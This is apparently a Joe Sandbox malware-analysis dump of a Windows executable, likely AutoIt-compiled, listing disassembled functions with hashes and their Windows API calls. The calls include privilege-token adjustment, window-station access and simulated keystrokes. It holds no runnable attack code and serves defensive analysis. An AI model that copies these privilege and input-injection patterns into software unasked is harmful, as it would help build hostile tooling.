                                                          • Opcode ID: 90849d4881ed5c9842a979fb467b9298f43356968b73cd746d501088dc9b012f
                                                          • Instruction ID: 1cd6f88ce9306e96b3cd7eae4ebadc044cb81917c62e59fdbbae20155f88b044
                                                          • Opcode Fuzzy Hash: 90849d4881ed5c9842a979fb467b9298f43356968b73cd746d501088dc9b012f
                                                          • Instruction Fuzzy Hash: F64106746043519FDB24DF24C498B1ABBE0BF45318F1988ACE89A9B362C732ED45CF52
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: 7e6ffd44b182eab9622c97f95b36c3bd1536456da4f9b4a3d7fb65348dcdf88f
                                                          • Instruction ID: 93e28eca3806e64bd8c6cefc079f162ab9cdddc391f7be8224e8b3fd03c98fb1
                                                          • Opcode Fuzzy Hash: 7e6ffd44b182eab9622c97f95b36c3bd1536456da4f9b4a3d7fb65348dcdf88f
                                                          • Instruction Fuzzy Hash: 1F213672604B18FBDF209F16F8856AA7BB4FB64354F20892EF486C5190EF3085D0D755
                                                          APIs
                                                            • Part of subcall function 00C64BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00C64BEF
                                                            • Part of subcall function 00C8525B: __wfsopen.LIBCMT ref: 00C85266
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00D252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C64E0F
                                                            • Part of subcall function 00C64B6A: FreeLibrary.KERNEL32(00000000), ref: 00C64BA4
                                                            • Part of subcall function 00C64C70: _memmove.LIBCMT ref: 00C64CBA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                          • String ID:
                                                          • API String ID: 1396898556-0
                                                          • Opcode ID: d7881357865c755426b298462f249475aa59021f19b5c774e6d17856e30cedf2
                                                          • Instruction ID: ec01d35299efca61700bad419f3cf6172661111f572e9923c3b12bbad69f4382
                                                          • Opcode Fuzzy Hash: d7881357865c755426b298462f249475aa59021f19b5c774e6d17856e30cedf2
                                                          • Instruction Fuzzy Hash: C511E731600205ABCF28BF70C896FADB7A4AF84710F10882DF552AB1C1DF719A01AB91
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: c28600184faef27da73800b147701abf51ca1d3a4352017eae838f68540781f7
                                                          • Instruction ID: 495c1af57d894e5baa8df53c2126134441fa1a7751a3908d1dfe19ded623012f
                                                          • Opcode Fuzzy Hash: c28600184faef27da73800b147701abf51ca1d3a4352017eae838f68540781f7
                                                          • Instruction Fuzzy Hash: 6E2113B4508341DFCB24DF64C484A1ABBE0BF88318F15896CF89A97762D731E809DF92
                                                          APIs
                                                          • __lock_file.LIBCMT ref: 00C848A6
                                                            • Part of subcall function 00C88B28: __getptd_noexit.LIBCMT ref: 00C88B28
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: __getptd_noexit__lock_file
                                                          • String ID:
                                                          • API String ID: 2597487223-0
                                                          • Opcode ID: 4642fbcd9a7bb6191cf85b5624b5bea3120bc83bb2bc76873b779db0dd9057dc
                                                          • Instruction ID: 2ab6b83770572b89db1b18128961dd064f6ff20cb54ce704fa62e1e595049cc4
                                                          • Opcode Fuzzy Hash: 4642fbcd9a7bb6191cf85b5624b5bea3120bc83bb2bc76873b779db0dd9057dc
                                                          • Instruction Fuzzy Hash: B4F0C23190060AEBDF15BFB48C067EE7AA1AF0032DF558414F424DA1D2CB78CA55EF59
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,?,00D252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C64E7E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: 68563842988bc5aca4f4aca3020780fad16946d829cbb4c98f88680403d74774
                                                          • Instruction ID: 5eb10ffcbe9b52fa01e7f11c5b25635f5747b2659fc8a462847f0ba7d5d19ec0
                                                          • Opcode Fuzzy Hash: 68563842988bc5aca4f4aca3020780fad16946d829cbb4c98f88680403d74774
                                                          • Instruction Fuzzy Hash: 4AF01571501B11CFCB389F65E4D4816FBE1BF143293208A3EE1E682620C7739940DB40
                                                          APIs
                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C807B0
                                                            • Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: LongNamePath_memmove
                                                          • String ID:
                                                          • API String ID: 2514874351-0
                                                          • Opcode ID: eec1de24710101476789f27590bc127337dcb21ba911ecd2aa9d199fbb19414b
                                                          • Instruction ID: b107b270551d1f32259ed6465c55b95bc4e5986fba8e18c6d449bc8f0a1cd220
                                                          • Opcode Fuzzy Hash: eec1de24710101476789f27590bc127337dcb21ba911ecd2aa9d199fbb19414b
                                                          • Instruction Fuzzy Hash: 1FE0CD3690412857C720D6599C06FFA77DDDFC87A0F0542B5FD0CD7244D9609C8086D0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: __wfsopen
                                                          • String ID:
                                                          • API String ID: 197181222-0
                                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                          • Instruction ID: 5aaaeae24a3f9bbb18aed53aab5f3fd5a656f68ee1f0dfe613488d2711e5f2d9
                                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                          • Instruction Fuzzy Hash: 3DB0927644020C7BCE012A82EC02A493B199B42768F408020FB0C18162AAB3A664AA89
                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 010154C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680268739.0000000001013000.00000040.00000020.00020000.00000000.sdmp, Offset: 01013000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1013000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                          • Instruction ID: 9578c7ca946471082df8dce423a5c533c4e559228ffa28d2917c657ef9f8e8bf
                                                          • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                          • Instruction Fuzzy Hash: 24E0BF7498010DEFDB00EFE4D9496DE7BB4EF04302F1045A1FD05D7681DB309E548A66
                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 010154C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680268739.0000000001013000.00000040.00000020.00020000.00000000.sdmp, Offset: 01013000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1013000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction ID: 07b0d36eded0fa505886779d535ec869a004a55562f16f293ee40437c5eb82df
                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction Fuzzy Hash: 22E0E67498010DDFDB00EFF4D9496DE7FB4EF04302F104161FD01D2281DA309D508A62
                                                          APIs
                                                            • Part of subcall function 00C62612: GetWindowLongW.USER32(?,000000EB), ref: 00C62623
                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00CECB37
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CECB95
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00CECBD6
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CECC00
                                                          • SendMessageW.USER32 ref: 00CECC29
                                                          • _wcsncpy.LIBCMT ref: 00CECC95
                                                          • GetKeyState.USER32(00000011), ref: 00CECCB6
                                                          • GetKeyState.USER32(00000009), ref: 00CECCC3
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CECCD9
                                                          • GetKeyState.USER32(00000010), ref: 00CECCE3
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CECD0C
                                                          • SendMessageW.USER32 ref: 00CECD33
                                                          • SendMessageW.USER32(?,00001030,?,00CEB348), ref: 00CECE37
                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00CECE4D
                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00CECE60
                                                          • SetCapture.USER32(?), ref: 00CECE69
                                                          • ClientToScreen.USER32(?,?), ref: 00CECECE
                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00CECEDB
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CECEF5
                                                          • ReleaseCapture.USER32 ref: 00CECF00
                                                          • GetCursorPos.USER32(?), ref: 00CECF3A
                                                          • ScreenToClient.USER32(?,?), ref: 00CECF47
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CECFA3
                                                          • SendMessageW.USER32 ref: 00CECFD1
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CED00E
                                                          • SendMessageW.USER32 ref: 00CED03D
                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00CED05E
                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00CED06D
                                                          • GetCursorPos.USER32(?), ref: 00CED08D
                                                          • ScreenToClient.USER32(?,?), ref: 00CED09A
                                                          • GetParent.USER32(?), ref: 00CED0BA
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CED123
                                                          • SendMessageW.USER32 ref: 00CED154
                                                          • ClientToScreen.USER32(?,?), ref: 00CED1B2
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CED1E2
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CED20C
                                                          • SendMessageW.USER32 ref: 00CED22F
                                                          • ClientToScreen.USER32(?,?), ref: 00CED281
                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00CED2B5
                                                            • Part of subcall function 00C625DB: GetWindowLongW.USER32(?,000000EB), ref: 00C625EC
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00CED351
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                          • String ID: @GUI_DRAGID$F
                                                          • API String ID: 3977979337-4164748364
                                                          • Opcode ID: 4f82d59ca50c9d5b8cf4ba002405f24d3a89b4e74cb2d4b4fd11ef570b87cb44
                                                          • Instruction ID: 046a24a9b12004e1db761cd71bdad10cd12000f867e6a56805ff24d66c1937ce
                                                          • Opcode Fuzzy Hash: 4f82d59ca50c9d5b8cf4ba002405f24d3a89b4e74cb2d4b4fd11ef570b87cb44
                                                          • Instruction Fuzzy Hash: E7428A74204381AFDB24CF26D885FAABBE5FF49310F14092DF566CB2A0C7719A52DB52
                                                          APIs
                                                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00CE84D0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: %d/%02d/%02d
                                                          • API String ID: 3850602802-328681919
                                                          • Opcode ID: 276d803a8f4e5018da8490a5c4a9ccdf6e26cf7557daba19ed14c4db49001138
                                                          • Instruction ID: 3edf624b88a0bff5af52973659105ae29b995457e72b6cd5c17fca743c8ae71e
                                                          • Opcode Fuzzy Hash: 276d803a8f4e5018da8490a5c4a9ccdf6e26cf7557daba19ed14c4db49001138
                                                          • Instruction Fuzzy Hash: BD12D271500289ABEB259F66CC89FAF7BF8EF45310F104129F919EB2E1DB749A45CB10
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _memmove$_memset
                                                          • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                          • API String ID: 1357608183-1798697756
                                                          • Opcode ID: a1225d7b347e79e4d84621c36dfd518584dfcac6c5cb6ade9b86ebeb1a512e5b
                                                          • Instruction ID: 70b07bfff1519a5539ad1324a453500df16c2d22b46466ccc3d6628db636f172
                                                          • Opcode Fuzzy Hash: a1225d7b347e79e4d84621c36dfd518584dfcac6c5cb6ade9b86ebeb1a512e5b
                                                          • Instruction Fuzzy Hash: D693A171E04219DFDB24CF98C891BEDB7B1FF48310F25816AE959AB291E7709E81CB50
                                                          APIs
                                                          • GetForegroundWindow.USER32(00000000,?), ref: 00C648DF
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C9D665
                                                          • IsIconic.USER32(?), ref: 00C9D66E
                                                          • ShowWindow.USER32(?,00000009), ref: 00C9D67B
                                                          • SetForegroundWindow.USER32(?), ref: 00C9D685
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C9D69B
                                                          • GetCurrentThreadId.KERNEL32 ref: 00C9D6A2
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9D6AE
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C9D6BF
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C9D6C7
                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00C9D6CF
                                                          • SetForegroundWindow.USER32(?), ref: 00C9D6D2
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C9D6E7
                                                          • keybd_event.USER32(00000012,00000000), ref: 00C9D6F2
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C9D6FC
                                                          • keybd_event.USER32(00000012,00000000), ref: 00C9D701
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C9D70A
                                                          • keybd_event.USER32(00000012,00000000), ref: 00C9D70F
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C9D719
                                                          • keybd_event.USER32(00000012,00000000), ref: 00C9D71E
                                                          • SetForegroundWindow.USER32(?), ref: 00C9D721
                                                          • AttachThreadInput.USER32(?,?,00000000), ref: 00C9D748
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 4125248594-2988720461
                                                          • Opcode ID: 705d95c7d94943bc4c6424ea108e2eba4f96e153c9f27a88cbce7d883fa04857
                                                          • Instruction ID: b0e02857745193172d0eb57d3b6ff605a4696ffa22ab31c51dc926e1e23a6275
                                                          • Opcode Fuzzy Hash: 705d95c7d94943bc4c6424ea108e2eba4f96e153c9f27a88cbce7d883fa04857
                                                          • Instruction Fuzzy Hash: F5315071A40358BBEF206BA19C89F7F7E6CEB44B50F114029FA05FA1D1CAB15941AAA1
                                                          APIs
                                                            • Part of subcall function 00CB87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CB882B
                                                            • Part of subcall function 00CB87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CB8858
                                                            • Part of subcall function 00CB87E1: GetLastError.KERNEL32 ref: 00CB8865
                                                          • _memset.LIBCMT ref: 00CB8353
                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00CB83A5
                                                          • CloseHandle.KERNEL32(?), ref: 00CB83B6
                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00CB83CD
                                                          • GetProcessWindowStation.USER32 ref: 00CB83E6
                                                          • SetProcessWindowStation.USER32(00000000), ref: 00CB83F0
                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00CB840A
                                                            • Part of subcall function 00CB81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CB8309), ref: 00CB81E0
                                                            • Part of subcall function 00CB81CB: CloseHandle.KERNEL32(?,?,00CB8309), ref: 00CB81F2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                          • String ID: $default$winsta0
                                                          • API String ID: 2063423040-1027155976
                                                          • Opcode ID: 0612ca9bb7b93738739012872f93fb6a7854eecc007655da177aee718a7a38ee
                                                          • Instruction ID: 83caf79a59a321904c1e32142ce3c344a93bd4c8d8f0f2d03625f331d3b9f7ef
                                                          • Opcode Fuzzy Hash: 0612ca9bb7b93738739012872f93fb6a7854eecc007655da177aee718a7a38ee
                                                          • Instruction Fuzzy Hash: 63814A71900249AFEF219FA4DC85BEE7BBDFF04304F144169F924A6261DB318E59EB60
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00CCC78D
                                                          • FindClose.KERNEL32(00000000), ref: 00CCC7E1
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CCC806
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CCC81D
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CCC844
                                                          • __swprintf.LIBCMT ref: 00CCC890
                                                          • __swprintf.LIBCMT ref: 00CCC8D3
                                                            • Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22
                                                          • __swprintf.LIBCMT ref: 00CCC927
                                                            • Part of subcall function 00C83698: __woutput_l.LIBCMT ref: 00C836F1
                                                          • __swprintf.LIBCMT ref: 00CCC975
                                                            • Part of subcall function 00C83698: __flsbuf.LIBCMT ref: 00C83713
                                                            • Part of subcall function 00C83698: __flsbuf.LIBCMT ref: 00C8372B
                                                          • __swprintf.LIBCMT ref: 00CCC9C4
                                                          • __swprintf.LIBCMT ref: 00CCCA13
                                                          • __swprintf.LIBCMT ref: 00CCCA62
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                          • API String ID: 3953360268-2428617273
                                                          • Opcode ID: a8cc2dba80bd26d1fe27aff1359bdfade6dbe932527eca93200477e4f8c9e986
                                                          • Instruction ID: f0f56c7ed107304d6d3c3aa8fcd54d08e2f2a0745c20fbc42f8332d46640e8e7
                                                          • Opcode Fuzzy Hash: a8cc2dba80bd26d1fe27aff1359bdfade6dbe932527eca93200477e4f8c9e986
                                                          • Instruction Fuzzy Hash: 18A10BB1408344ABC710EFA4C9C5EAFB7ECFF98704F40091DF59586191EA35EA49DB62
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00CCEFB6
                                                          • _wcscmp.LIBCMT ref: 00CCEFCB
